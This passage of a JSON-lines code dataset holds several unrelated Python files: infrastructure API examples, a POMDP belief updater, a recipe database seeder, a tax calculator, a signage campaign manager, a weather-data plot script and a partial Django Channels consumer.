serverHardwareTypeUri=hardware_type.data[\"uri\"])\nprint(available_networks)\n\n# Get by name\nprint(\"\\nGet a server profile template by name\")\ntemplate = oneview_client.server_profile_templates.get_by_name(server_profile_name)\nif template:\n    pprint(template.data)\nelse:\n    # Create a server profile template\n    print(\"Create a basic connection-less server profile template \")\n    basic_template_options = dict(\n        name=server_profile_name,\n        serverHardwareTypeUri=hardware_type.data[\"uri\"],\n        enclosureGroupUri=enclosure_group.data[\"uri\"]\n    )\n    template = profile_templates.create(basic_template_options)\n    pprint(template.data)\n\n# Update bootMode from recently created template\nprint(\"\\nUpdate bootMode from recently created template\")\ntemplate_to_update = template.data.copy()\ntemplate_to_update[\"bootMode\"] = dict(manageMode=True, mode=\"BIOS\")\ntemplate.update(template_to_update)\npprint(template.data)\n\n# Get new profile\nprint(\"\\nGet new profile\")\nprofile = template.get_new_profile()\npprint(profile)\n\nif oneview_client.api_version >= 300:\n    # Get server profile template transformation\n    print(\"\\nGet a server profile template transformation\")\n    hardware = hardware_types.get_by_name(hardware_type_for_transformation)\n    enclosure_group = enclosure_groups.get_by_name(enclosure_group_for_transformation)\n\n    transformation = template.get_transformation(hardware.data[\"uri\"],\n                                                 enclosure_group.data[\"uri\"])\n    pprint(transformation)\n\n# Delete the created template\nprint(\"\\nDelete the created template\")\ntemplate.delete()\nprint(\"The template was successfully deleted.\")\n","sub_path":"examples/server_profile_templates.py","file_name":"server_profile_templates.py","file_ext":"py","file_size_in_byte":5395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"606971816","text":"from collections import defaultdict\nfrom simple_rl.planning.ValueIterationClass import ValueIteration\n\nimport pdb\n\nclass BeliefUpdater(object):\n    ''' Wrapper class for different methods for belief state updates in POMDPs. 
'''\n\n    def __init__(self, mdp, transition_func, reward_func, observation_func, updater_type='discrete', observation_prob_func=None, transition_prob_func=None):\n        '''\n        Args:\n            mdp (POMDP)\n            transition_func: T(s, a) --> s'\n            reward_func: R(s, a) --> float\n            observation_func: O(s) --> z\n            updater_type (str)\n            observation_prob_func: O(o,s,a) --> Prob(o | s,a)\n            transition_prob_func: currently unused\n        '''\n        self.reward_func = reward_func\n        self.updater_type = updater_type\n\n        # We use the ValueIteration class to construct the transition and observation probabilities\n        self.vi = ValueIteration(mdp, sample_rate=500)\n\n        self.transition_probs = self.construct_transition_matrix(transition_func)\n        self.observation_probs = self.construct_observation_matrix(observation_func)\n\n        self.observation_prob_func = observation_prob_func\n        if updater_type == 'discrete':\n            self.updater = self.discrete_filter_updater\n        elif updater_type == 'kalman':\n            self.updater = self.kalman_filter_updater\n        elif updater_type == 'particle':\n            self.updater = self.particle_filter_updater\n        else:\n            raise AttributeError('updater_type {} did not conform to expected type'.format(updater_type))\n\n    def discrete_filter_updater(self, belief, action, observation):\n        def _compute_normalization_factor(bel):\n            return sum(bel.values())\n\n        def _update_belief_for_state(b, sp, T, O, a, z):\n            return O[sp][a][z] * sum([T[s][a][sp] * b[s] for s in b])\n\n        new_belief = defaultdict()\n        for sprime in belief:\n            new_belief[sprime] = _update_belief_for_state(belief, sprime, self.transition_probs, self.observation_probs, action, observation)\n\n        normalization = _compute_normalization_factor(new_belief)\n\n        for sprime in belief:\n            if normalization > 0: new_belief[sprime] /= normalization\n\n        return new_belief\n    # def flat_discrete_belief_updater(self, belief, action, observation):\n    #     observation_probs = [self.observation_prob_func(observation, )]\n\n\n    def discrete_filter_updater_Fetch(self, belief, action, observation):\n        # NOTE: incomplete -- this computes per-item observation probabilities but does not yet build and return an updated belief\n        observation_probs = [self.observation_prob_func(observation, {\"desired_item\": i, \"last_referenced_item\": belief[0]}) for i in\n                             range(len(belief[1]))]\n\n    def kalman_filter_updater(self, belief, action, observation):\n        pass\n\n    def particle_filter_updater(self, belief, action, observation):\n        pass\n\n    def construct_transition_matrix(self, transition_func):\n        '''\n        Create an MLE of the transition probabilities by sampling from the transition_func\n        multiple times.\n        Args:\n            transition_func: T(s, a) -> s'\n\n        Returns:\n            transition_probabilities (defaultdict): T(s, a, s') --> float\n        '''\n        self.vi._compute_matrix_from_trans_func()\n        return self.vi.trans_dict\n\n    def construct_observation_matrix(self, observation_func):\n        '''\n        Create an MLE of the observation probabilities by sampling from the observation_func\n        multiple times.\n        Args:\n            observation_func: O(s) -> z\n\n        Returns:\n            observation_probabilities (defaultdict): O(s, a, z) --> float\n        '''\n        obs_dict = defaultdict(lambda:defaultdict(lambda:defaultdict(float)))\n        for state in self.vi.get_states():\n            for action in self.vi.mdp.actions:\n                for sample in range(self.vi.sample_rate):\n                    observation = observation_func(state, action)\n                    obs_dict[state][action][observation] += 1. 
/ self.vi.sample_rate\n return obs_dict","sub_path":"zips/simple_rl-FetchPOMDP/simple_rl/pomdp/BeliefUpdaterClass.py","file_name":"BeliefUpdaterClass.py","file_ext":"py","file_size_in_byte":4004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"274299101","text":"from app.models import db, RecipeIngredient\n\n\n# Adds a demo user, you can add other users here if you want\ndef seed_recipe_ingredients():\n tofu = RecipeIngredient(\n ingredient='Tofu (Extra Firm)', measurement='400 grams', recipe_id=1)\n cornflour_for_tofu = RecipeIngredient(\n ingredient='Cornflour (For Tofu)', measurement='2 tablespoons', recipe_id=1)\n salt = RecipeIngredient(\n ingredient='Salt', measurement='1/2 teaspoon', recipe_id=1)\n pepper = RecipeIngredient(\n ingredient='Pepper (Ground)', measurement='1/4 teaspoon', recipe_id=1)\n vegetable_oil_for_tofu = RecipeIngredient(\n ingredient='Vegetable Oil (For Tofu)', measurement='1 1/2 tablespoon', recipe_id=1)\n soy_sauce = RecipeIngredient(\n ingredient='Soy Sauce', measurement='1/4 cup', recipe_id=1)\n hoisin_sauce = RecipeIngredient(\n ingredient='Hoisin Sauce', measurement='2 teaspoons', recipe_id=1)\n rice_vinegar = RecipeIngredient(\n ingredient='Rice Vinegar', measurement='2 teaspoons', recipe_id=1)\n sesame_oil = RecipeIngredient(\n ingredient='Toasted Sesame Oil', measurement='1 tablespoon', recipe_id=1)\n chili_flakes = RecipeIngredient(\n ingredient='Chili Flakes', measurement='1 teaspoon', recipe_id=1)\n cornflour_for_sauce = RecipeIngredient(\n ingredient='Cornflour (For Sauce)', measurement='1 tablespoon', recipe_id=1)\n water = RecipeIngredient(\n ingredient='Water', measurement='1/4 cup', recipe_id=1)\n vegetable_oil_for_stirfry = RecipeIngredient(\n ingredient='Vegetable Oil (For Stir Fry)', measurement='1 tablespoon', recipe_id=1)\n garlic = RecipeIngredient(\n ingredient='Garlic (Finely Chopped)', measurement='4 cloves', recipe_id=1)\n ginger = RecipeIngredient(\n ingredient='Ginger (Peeled, Finely Chopped)', measurement='1 inch', recipe_id=1)\n broccoli = RecipeIngredient(\n ingredient='Broccoli Florets', measurement='1 whole head', recipe_id=1)\n sesame_seeds = RecipeIngredient(\n ingredient='Toasted Sesame Seeds', recipe_id=1)\n green_onion = RecipeIngredient(\n ingredient='Green Onion (Chopped)', recipe_id=1)\n cooked_broccoli = RecipeIngredient(\n ingredient='Broccoli (Cooked)', measurement='2 cups', recipe_id=2)\n raw_cauliflower = RecipeIngredient(\n ingredient='Cauliflower', measurement='1 head', recipe_id=2)\n coconut_oil = RecipeIngredient(\n ingredient='Coconut Oil', measurement='1 tablespoon', recipe_id=2)\n brown_rice = RecipeIngredient(\n ingredient='Brown Rice (Cooked)', measurement='3 cups', recipe_id=2)\n garlic_vegie_fried_rice = RecipeIngredient(\n ingredient='Garlic (Finely Chopped)', measurement='5 cloves', recipe_id=2)\n soy_sauce_vegie_fried_rice = RecipeIngredient(\n ingredient='Soy Sauce', measurement='3 tablespoons', recipe_id=2)\n frozen_peas = RecipeIngredient(\n ingredient='Frozen Peas', measurement='1 cup', recipe_id=2)\n scallion = RecipeIngredient(\n ingredient='Scallions', measurement='8 chopped', recipe_id=2)\n sesame_oil_vegie_fried_rice = RecipeIngredient(\n ingredient='Sesame Oil', measurement='2 teaspoons', recipe_id=2)\n sesame_seeds_vegie_fried_rice = RecipeIngredient(\n ingredient='Sesame Seeds', recipe_id=2)\n basil = RecipeIngredient(\n ingredient='Basil', measurement='1/4 cup', recipe_id=3)\n flour = RecipeIngredient(\n ingredient='Flour', 
measurement='1 cup', recipe_id=3)\n    garlic_powder = RecipeIngredient(\n        ingredient='Garlic Powder', measurement='1/4 teaspoon', recipe_id=3)\n    garlic_salt = RecipeIngredient(\n        ingredient='Garlic Salt', measurement='pinch', recipe_id=3)\n    potatoes = RecipeIngredient(\n        ingredient='Potatoes', measurement='4 whole', recipe_id=3)\n    vegetable_oil_garlic_fries = RecipeIngredient(\n        ingredient='Vegetable Oil', measurement='splash', recipe_id=3)\n    banana = RecipeIngredient(\n        ingredient='Banana', measurement='1/4 cup', recipe_id=4)\n    graham_cracker_crumbs = RecipeIngredient(\n        ingredient='Graham Cracker Crumbs', measurement='2 tablespoons', recipe_id=4)\n    soy_milk = RecipeIngredient(\n        ingredient='Soy Milk', measurement='1 cup', recipe_id=4)\n    strawberry = RecipeIngredient(\n        ingredient='Strawberry', measurement='1/2 cup', recipe_id=4)\n    vanilla_yogurt = RecipeIngredient(\n        ingredient='Vanilla Yogurt', measurement='splash', recipe_id=4)\n    balsamic_vinegar = RecipeIngredient(\n        ingredient='Balsamic Vinegar', measurement='3 tablespoons', recipe_id=5)\n    garlic_garlicky_kale = RecipeIngredient(\n        ingredient='Garlic', measurement='1 clove', recipe_id=5)\n    kale = RecipeIngredient(\n        ingredient='Kale', measurement='1 bunch', recipe_id=5)\n    olive_oil = RecipeIngredient(\n        ingredient='Olive Oil', measurement='splash', recipe_id=5)\n    brown_rice_jumbalaya = RecipeIngredient(\n        ingredient='Brown Rice (Cooked and Dried)', measurement='2 cups', recipe_id=6)\n    carrots = RecipeIngredient(\n        ingredient='Carrots', measurement='2 medium', recipe_id=6)\n    celery = RecipeIngredient(\n        ingredient='Celery', measurement='2 stalks', recipe_id=6)\n    celery_seed = RecipeIngredient(\n        ingredient='Celery Seeds', measurement='1 teaspoon', recipe_id=6)\n    kidney_beans = RecipeIngredient(\n        ingredient='Kidney Beans (Cooked and Dried)', measurement='2 cups', recipe_id=6)\n    marjoram = RecipeIngredient(\n        ingredient='Marjoram (Dried)', measurement='1 teaspoon', recipe_id=6)\n    thyme = RecipeIngredient(\n        ingredient='Thyme (Dried)', measurement='2 teaspoons', recipe_id=6)\n    eggplant = RecipeIngredient(\n        ingredient='Eggplant', measurement='1 medium', recipe_id=6)\n    garlic_jumbalaya = RecipeIngredient(\n        ingredient='Garlic', measurement='1/5 clove', recipe_id=6)\n    green_beans = RecipeIngredient(\n        ingredient='Green Beans', measurement='3 handfuls', recipe_id=6)\n    black_pepper = RecipeIngredient(\n        ingredient='Black Pepper (Fresh Ground)', measurement='pinch', recipe_id=6)\n    sage = RecipeIngredient(\n        ingredient='Sage (Ground)', measurement='2 teaspoons', recipe_id=6)\n    liquid_smoke = RecipeIngredient(\n        ingredient='Liquid Smoke', measurement='1/2 teaspoon', recipe_id=6)\n    olive_oil_jumbalaya = RecipeIngredient(\n        ingredient='Olive Oil', measurement='2 tablespoons', recipe_id=6)\n    red_bell_pepper = RecipeIngredient(\n        ingredient='Red Bell Pepper', measurement='1 medium', recipe_id=6)\n    red_onion = RecipeIngredient(\n        ingredient='Red Onion (Diced)', measurement='1 small', recipe_id=6)\n    sea_salt = RecipeIngredient(\n        ingredient='Sea Salt', measurement='1 1/2 tablespoons', recipe_id=6)\n    siracha = RecipeIngredient(\n        ingredient='Sriracha', measurement='1 teaspoon', recipe_id=6)\n    tomatoes = RecipeIngredient(\n        ingredient='Tomatoes (Diced)', measurement='2 medium', recipe_id=6)\n    vegetable_stock = RecipeIngredient(\n        ingredient='Vegetable Stock', measurement='3 cups', recipe_id=6)\n    \n    \n\n    db.session.add(tofu)\n    db.session.add(cornflour_for_tofu)\n    db.session.add(salt)\n    db.session.add(pepper)\n    db.session.add(vegetable_oil_for_tofu)\n
    db.session.add(soy_sauce)\n    db.session.add(hoisin_sauce)\n    db.session.add(rice_vinegar)\n    db.session.add(sesame_oil)\n    db.session.add(chili_flakes)\n    db.session.add(cornflour_for_sauce)\n    db.session.add(water)\n    db.session.add(vegetable_oil_for_stirfry)\n    db.session.add(garlic)\n    db.session.add(ginger)\n    db.session.add(broccoli)\n    db.session.add(sesame_seeds)\n    db.session.add(green_onion)\n    db.session.add(cooked_broccoli)\n    db.session.add(raw_cauliflower)\n    db.session.add(coconut_oil)\n    db.session.add(brown_rice)\n    db.session.add(garlic_vegie_fried_rice)\n    db.session.add(soy_sauce_vegie_fried_rice)\n    db.session.add(frozen_peas)\n    db.session.add(scallion)\n    db.session.add(sesame_oil_vegie_fried_rice)\n    db.session.add(sesame_seeds_vegie_fried_rice)\n    db.session.add(basil)\n    db.session.add(flour)\n    db.session.add(garlic_powder)\n    db.session.add(garlic_salt)\n    db.session.add(potatoes)\n    db.session.add(vegetable_oil_garlic_fries)\n    db.session.add(banana)\n    db.session.add(graham_cracker_crumbs)\n    db.session.add(soy_milk)\n    db.session.add(strawberry)\n    db.session.add(vanilla_yogurt)\n    db.session.add(balsamic_vinegar)\n    db.session.add(garlic_garlicky_kale)\n    db.session.add(kale)\n    db.session.add(olive_oil)\n    db.session.add(brown_rice_jumbalaya)\n    db.session.add(carrots)\n    db.session.add(celery)\n    db.session.add(celery_seed)\n    db.session.add(kidney_beans)\n    db.session.add(marjoram)\n    db.session.add(thyme)\n    db.session.add(eggplant)\n    db.session.add(garlic_jumbalaya)\n    db.session.add(green_beans)\n    db.session.add(black_pepper)\n    db.session.add(sage)\n    db.session.add(liquid_smoke)\n    db.session.add(olive_oil_jumbalaya)\n    db.session.add(red_bell_pepper)\n    db.session.add(red_onion)\n    db.session.add(sea_salt)\n    db.session.add(siracha)\n    db.session.add(tomatoes)\n    db.session.add(vegetable_stock)\n    \n\n    db.session.commit()\n\n\n# Uses a raw SQL query to TRUNCATE the recipe_ingredients table.\n# SQLAlchemy doesn't have a built in function to do this\n# TRUNCATE Removes all the data from the table, and RESET IDENTITY\n# resets the auto incrementing primary key, CASCADE deletes any\n# dependent entities\ndef undo_recipe_ingredients():\n    db.session.execute('TRUNCATE recipe_ingredients RESTART IDENTITY CASCADE;')\n    db.session.commit()\n","sub_path":"app/seeds/recipe_ingredients.py","file_name":"recipe_ingredients.py","file_ext":"py","file_size_in_byte":9643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"479969106","text":"#!/usr/bin/env python\r\n# coding=utf8\r\n\r\nimport re\r\n\r\nmy_file = '/root/ls.tmp'\r\nhostConfigRe = r'^\\s*' + 'ssli' + r'\\s*.*$'\r\npattern = re.compile(hostConfigRe)\r\n\r\nwith open(my_file) as f:\r\n    lines = f.readlines()\r\n\r\nwith open(my_file, 'w') as f:\r\n    for line in lines:\r\n        result = pattern.match(line.lower())\r\n        if result is None:\r\n            f.write(line)\r\n        else:\r\n            f.write(line.replace(line, '# ' + line))\r\n","sub_path":"demo/replace_file_str.py","file_name":"replace_file_str.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"197866767","text":"diz = {15000 : 23,\n28000 : 27,\n55000 : 38,\n75000 : 41,\n1000000000000 : 43}\n\nreddito = int(input(\"Inserisci il reddito in euro: \"))\n\nimposta=0\nscaglione_prec = 0\nfor scaglione in diz:\n    importo_da_tassare=0\n    if reddito>=scaglione:\n        importo_da_tassare = scaglione-scaglione_prec\n    elif reddito<scaglione and reddito>scaglione_prec:\n        importo_da_tassare = reddito - scaglione_prec\n    else:\n        break\n    \n
    imposta += importo_da_tassare * diz[scaglione] / 100\n    scaglione_prec = scaglione\n\nprint(\"L'imposta totale è di euro: \", round(imposta,3))\ntax = imposta * 100 / reddito\nprint(\"La tassazione media applicata è: \", round(tax,2), \"%\")\n\n","sub_path":"es_29_pag_190.py","file_name":"es_29_pag_190.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"276906831","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.3-i386/egg/golem/db/fs.py\n# Compiled at: 2008-08-22 15:02:55\nimport sys, os, shutil, golem\nfrom lxml import etree\nimport md5\n\nclass xmldb(object):\n    __module__ = __name__\n\n    def __init__(self, path):\n        \"\"\"open-or-create xml collection\n\nin the flatfile context, that corresponds to a directory, doesn't it...\n- so all we do is store the file in the directory.\n        \"\"\"\n        self.files = [ x for x in os.listdir(path) if x.endswith('.xml') ]\n        self.dir = path\n\n    def add(self, *filenames):\n        \"\"\" add files to database - which just means copy to directory.\"\"\"\n        for file in filenames:\n            shutil.copy(file, self.dir)\n\n    def qfile(self, filename, conceptlist, single=False):\n        tree = etree.parse(filename)\n        xpath = golem.helpers.xpath.xpath(conceptlist)\n        res = []\n        for x in xpath:\n            res.extend(tree.xpath(x, conceptlist[(-1)].parentdictionary.namespaces))\n\n        if single:\n            if len(res) != 1:\n                raise AssertionError('Insufficiently specific search set - multiple instances returned.\\n')\n        del tree\n        return res\n\n    def query(self, *conceptsets):\n        evaluators = [ x[(-1)] for x in conceptsets ]\n        rawres = []\n        for fn in self.files:\n            f = os.path.join(self.dir, fn)\n            rawres.append(golem.db.resultlist([], filename=f))\n            for conceptlist in conceptsets:\n                rawres[(-1)].extend(self.qfile(f, conceptlist, single=True))\n\n        results = []\n        for rawrow in rawres:\n            row = golem.db.resultlist([], filename=rawrow.filename)\n            for idx in range(len(rawrow)):\n                ev = evaluators[idx]\n                row.append(ev.getvalue(rawrow[idx]))\n\n            results.append(row)\n\n        return results\n\n    def query_cached(self, cache, *conceptsets):\n        evaluators = [ x[(-1)] for x in conceptsets ]\n        res = []\n        for fn in self.files:\n            f = os.path.join(self.dir, fn)\n            row = golem.db.resultlist([], filename=f)\n            res.append(row)\n            md5sum = md5.md5(open(f, 'r').read()).hexdigest()\n            if f in cache and md5sum in cache[f]:\n                for idx in range(len(conceptsets)):\n                    conceptlist = conceptsets[idx]\n                    clkey = ('').join([ c.id for c in conceptlist ])\n                    ev = evaluators[idx]\n                    if clkey in cache[f][md5sum]:\n                        row.append(cache[f][md5sum][clkey])\n                    else:\n                        xv = self.qfile(f, conceptlist, single=True)\n                        assert len(xv) == 1\n                        val = ev.getvalue(xv[0])\n                        row.append(val)\n                        cache[f][md5sum][clkey] = val\n\n            else:\n                cache[f] = {}\n                cache[f][md5sum] = {}\n                for idx in range(len(conceptsets)):\n                    conceptlist = conceptsets[idx]\n                    clkey = ('').join([ c.id for c in conceptlist ])\n                    ev = evaluators[idx]\n                    xv = self.qfile(f, conceptlist, single=True)\n                    assert len(xv) == 1\n                    val = ev.getvalue(xv[0])\n                    row.append(val)\n                    cache[f][md5sum][clkey] = val\n\n        return res\n\n\nif __name__ == '__main__':\n    pass","sub_path":"pycfiles/golem-1.01-py2.4/fs.py","file_name":"fs.py","file_ext":"py","file_size_in_byte":3570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"24926487","text":"import json\nimport 
logging\nfrom manager import Manager\nimport datetime\n\nlog = logging.getLogger(\"uk.co.tomsl-LinuxDigitalSignageClient | campaign_manager.py\")\n\nclass CampaignManager(Manager):\n \"\"\"Manages loading and validating campaigns.\n\n Attributes:\n campaign_directory (str): The directory in which campaigns are stored.\n campaigns (:obj:`list` of :obj:`Campaign`): A list of Campaign objects loaded from campaign files.\n playlist_manager (:obj:`PlaylistManager`): A reference to the Playlist Manager holding playlist data.\n\n \"\"\"\n\n def __init__(self, campaign_directory, playlist_manager):\n \"\"\"Initialise Campaign Manager.\n\n Args:\n campaign_directory (str): Path to campaigns directory (relative to \n wherever this file was run from).\n playlist_manager (:obj:`PlaylistManager`): A reference to the Playlist Manager holding playlist data.\n \n \"\"\"\n log.info(\"Starting campaign manager\")\n self.campaign_directory = campaign_directory\n self.campaigns = None\n self.playlist_manager = playlist_manager\n\n def scan_campaign_directory(self):\n \"\"\"Should be used by any other objects to start loading campaigns.\"\"\"\n log.info(\"Scanning campaign directory\")\n\n # Call load_all_campaigns to load campaigns from file.\n self.load_all_campaigns()\n\n log.info(\"Found \" + str(len(self.campaigns)) + \" campaigns\")\n\n def load_all_campaigns(self):\n \"\"\"Loads all campaigns from the campaigns directory.\"\"\"\n self.campaigns = []\n\n # Scan campaigns directory for files.\n campaigns = self.scan_directory(self.campaign_directory)\n\n # Store whether a campaign called 'Main' has been found.\n main_found = False\n\n for campaign in campaigns:\n\n # Check that campaign file ends in .json\n if campaign.endswith('.json'):\n # Load data from file in a dictionary.\n data = []\n with open(campaign) as f:\n data = json.load(f)\n data = dict(data)\n\n # Create a Campaign object and populate with data from file.\n campaign_obj = Campaign(self.playlist_manager)\n if data.__contains__('name'):\n campaign_obj.name = data['name']\n if data.__contains__('startTime'):\n campaign_obj.set_start_time(data['startTime'])\n if data.__contains__('endTime'):\n campaign_obj.set_end_time(data['endTime'])\n if data.__contains__('playlistOrder'):\n campaign_obj.set_playlist_order(data['playlistOrder'])\n\n # Check that the campaign is valid.\n if self.validate_campaign(campaign_obj):\n self.campaigns.append(campaign_obj)\n\n # Check whether we've found the Main campaign.\n if campaign_obj.name == \"Main\":\n main_found = True\n \n # If we've not found a valid Main campaign, error.\n if not main_found:\n print(\"Error\")\n\n def validate_campaign(self, campaign):\n \"\"\"Checks whether a campaign is valid.\n \n Args:\n campaign (:obj:`Campaign`): The campaign object to validate.\n\n Returns:\n True if the campaign is valid, False otherwise.\n \n \"\"\"\n # Main campaign does not have a start/end time and must contain at least one item.\n if campaign.name == \"Main\":\n if campaign.start_time != -1:\n return False\n if campaign.end_time != -1:\n return False\n if len(campaign.playlist_order) < 1:\n return False\n return True\n else:\n # Campaign must use the same type of time for start/end.\n if campaign.start_time_type != campaign.end_time_type:\n return False\n # End time must be later than start time.\n if campaign.start_time >= campaign.end_time:\n return False\n # Campaign must contain at least one item.\n if len(campaign.playlist_order) < 1:\n return False\n return True\n\nclass Campaign:\n \"\"\"Stores 
information about an individual campaign.\n\n Attributes:\n name (str): Campaign name, assumed to be unique.\n start_time (:obj:`DateTime`): Start time of the campaign.\n start_time_type (str): Type of start time, either \"MAIN\", \"RELATIVE\" or \"EXACT\".\n end_time (:obj:`DateTime`): End time of the campaign.\n end_time_type (str): Type of end time, either \"MAIN\", \"RELATIVE\" or \"EXACT\".\n playlist_order (:obj:`list` of :obj:`Playlist`): Playlists belonging to this campaign, in order of play.\n playlist_manager (:obj:`PlaylistManager`): Reference to the playlist manager containing loaded playlists.\n\n \"\"\"\n\n def __init__(self, playlist_manager):\n \"\"\"Initialise Campaign.\n \n Args:\n playlist_manager (:obj:`PlaylistManager`): Reference to a playlist manager.\n \"\"\"\n self.name = None\n self.start_time = None\n self.start_time_type = None\n self.end_time = None\n self.end_time_type = None\n self.playlist_order = None\n self.playlist_manager = playlist_manager\n\n def set_start_time(self, time):\n \"\"\"Sets the start time and type of the campaign.\n\n Args:\n time (str): Time written either as 24 hour time (0123) or UNIX timestamp (or -1).\n\n \"\"\"\n\n ret_time = self.get_time_object(time)\n self.start_time = ret_time[0]\n self.start_time_type = ret_time[1]\n\n def set_end_time(self, time):\n \"\"\"Sets the end time and type of the campaign.\n\n Args:\n time (str): Time written either as 24 hour time (0123) or UNIX timestamp (or -1).\n\n \"\"\"\n\n ret_time = self.get_time_object(time)\n self.end_time = ret_time[0]\n self.end_time_type = ret_time[1]\n\n def set_playlist_order(self, order):\n \"\"\"Sets the order of playlists to play.\n\n Args:\n order (:obj:`list` of str): List of playlist names.\n\n \"\"\"\n\n self.playlist_order = []\n for lst in order:\n # Validates that playlist exists\n if self.playlist_manager.playlist_exists(lst):\n self.playlist_order.append(lst)\n\n def get_time_object(self, time):\n \"\"\"Convert a time string to a time object.\n\n Args:\n time (str): Time as either 24 hour time (0123), UNIX timestamp or -1\n\n Returns:\n list containing translated time and time type. 
Translated time is: -1 if time == -1, otherwise a DateTime object.\n\n        \"\"\"\n\n        if len(time) < 4:\n            if time == \"-1\":\n                return [-1, \"MAIN\"]\n            else:\n                # Unrecognised value: log it and fall back to a MAIN-type\n                # time so that validate_campaign() rejects the campaign.\n                log.error(\"Invalid time string: \" + str(time))\n                return [-1, \"MAIN\"]\n        else:\n            if len(time) == 4:\n                # 24 hour time \"HHMM\": hours are time[:2], minutes are time[2:].\n                return [datetime.time(int(time[:2]), int(time[2:]), 0, 0), \"RELATIVE\"]\n            else:\n                return [datetime.datetime.utcfromtimestamp(int(time)), \"EXACT\"]","sub_path":"src/campaign_manager.py","file_name":"campaign_manager.py","file_ext":"py","file_size_in_byte":7216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"76251540","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 11 22:24:33 2017\n\n@author: Pulkit\n\"\"\"\n\n#imports\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt, pylab as ply\nplt.style.use('ggplot')\n\n\nfile_name='NOAAData.csv' # file to work with\n\ndf_wd = pd.read_csv(file_name)\n\ndf_wd['Month_Date'] = df_wd['Date'].apply(lambda x : x[-5:]) #creating new column from Date\n\n'''Removing 29 feb, filtering out dates for year 2015, selecting Element as TMIN, grouping on Month_Date and agg min\n   value per day.'''\n\n\ndf_wd_min = df_wd[~(df_wd['Date'].str[-5:]=='02-29') & (pd.to_datetime(df_wd['Date']) < '2015-01-01') &\n                  (df_wd['Element']=='TMIN')].groupby('Month_Date').agg({'Data_Value':np.min})\n\n\n'''Removing 29 feb, filtering out dates for year 2015, selecting Element as TMAX, grouping on Month_Date and agg max\n   value per day.'''\n\ndf_wd_max = df_wd[~(df_wd['Date'].str[-5:]=='02-29') & (pd.to_datetime(df_wd['Date']) < '2015-01-01') &\n                  (df_wd['Element']=='TMAX')].groupby('Month_Date').agg({'Data_Value':np.max})\n\n\n\n'''Removing 29 feb, extracting dates for year 2015, selecting Element as TMIN, grouping on Month_Date and agg min\n   value per day.'''\n\ndf_2015_min = df_wd[~(df_wd['Date'].str[-5:]=='02-29') & (pd.to_datetime(df_wd['Date']) > '2014-12-31') &\n                    (df_wd['Element']=='TMIN')].groupby('Month_Date').agg({'Data_Value':np.min})\n\n\n\n'''Removing 29 feb, extracting dates for year 2015, selecting Element as TMAX, grouping on Month_Date and agg max\n   value per day.'''\n\ndf_2015_max = df_wd[~(df_wd['Date'].str[-5:]=='02-29') & (pd.to_datetime(df_wd['Date']) > '2014-12-31') &\n                    (df_wd['Element']=='TMAX')].groupby('Month_Date').agg({'Data_Value':np.max})\n\n\n'''Finding index of the days in year 2015 where min temperature is less than years 2005-2014 and max temperature\n   is greater than years 2005-2014'''\nmin_break,max_break = zip( *zip(np.where(df_2015_min['Data_Value'] < df_wd_min['Data_Value']) , \n                     np.where(df_2015_max['Data_Value'] > df_wd_max['Data_Value'])))\n\n\n# to be used as xtick labels\nmonth_list = ['Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec']\n\n\nplt.figure(figsize=(10,4)) #creating the canvas \nplt.plot(df_wd_min.values/10, label = 'low',color='blue') #plotting min values for the years 2005-2014\nplt.plot(df_wd_max.values/10,color='red', label = 'high') #plotting max values for the years 2005-2014 \n\n#scatter plots of points where the record of max and min temperatures were broken in the year 2015\nplt.scatter(min_break,df_2015_min.iloc[min_break]/10,s=20,c = 'm', label = 'min_break') \nplt.scatter(max_break,df_2015_max.iloc[max_break]/10,s=20,c = 'g', label = 'max_break')\n\nplt.title('Month Wise Temperature Summary from 2005-2015') #plot title\nplt.xlabel('Months') #xlabel(x-axis label)\nplt.ylabel('Temperature (Degree C)') #ylabel(y-axis label)\nplt.xticks(range(0,len(df_wd_max.index),33), month_list) #allocating xticks and 
xticklabels\n\nplt.legend() #adding legend\nplt.grid() #removing grid lines\n\n#filling the gap between min and max values\nplt.gca().fill_between(range(len(df_wd_max)),df_wd_max['Data_Value']/10,df_wd_min['Data_Value']/10,facecolor='blue',alpha=0.25 )\nply.savefig('MonthlyTemperatureSummary2005-2015.png', bbox_inches='tight') #save plot to png file\nplt.show() #show the plot\n\n\n","sub_path":"PlottingWeatherData/PlottingWeatherData.py","file_name":"PlottingWeatherData.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"322024705","text":"\nfrom channels.generic.websocket import AsyncWebsocketConsumer\nimport json\nfrom channels.db import database_sync_to_async\nfrom core.models import Room\n\n\n\n@database_sync_to_async\ndef room_user_left(room_id,player_num):\n try:\n room = Room.objects.get(pk=room_id)\n if room.player1_profile==player_num and not room.player1_left:\n # print(\"user left 1\")\n room.player1_score=-1\n room.player1_left=True\n room.save()\n elif room.player2_profile==player_num and not room.player2_left:\n # print(\"user left 2\")\n room.player2_score=-1\n room.player2_left=True\n room.save()\n room.save()\n return room\n except Room.DoesNotExist:\n pass\n\n@database_sync_to_async\ndef get_room(room_id):\n try:\n room = Room.objects.get(pk=room_id)\n \n return room\n except Room.DoesNotExist:\n return None\n\n\nclass RoomConsumer(AsyncWebsocketConsumer):\n\n player1=0\n player2=0\n is_random=False\n\n async def connect(self):\n\n if self.scope['user'].is_authenticated:\n # print(\"Accept\")\n # Accept the connection\n await self.accept()\n \n else:\n # Reject the connection\n # 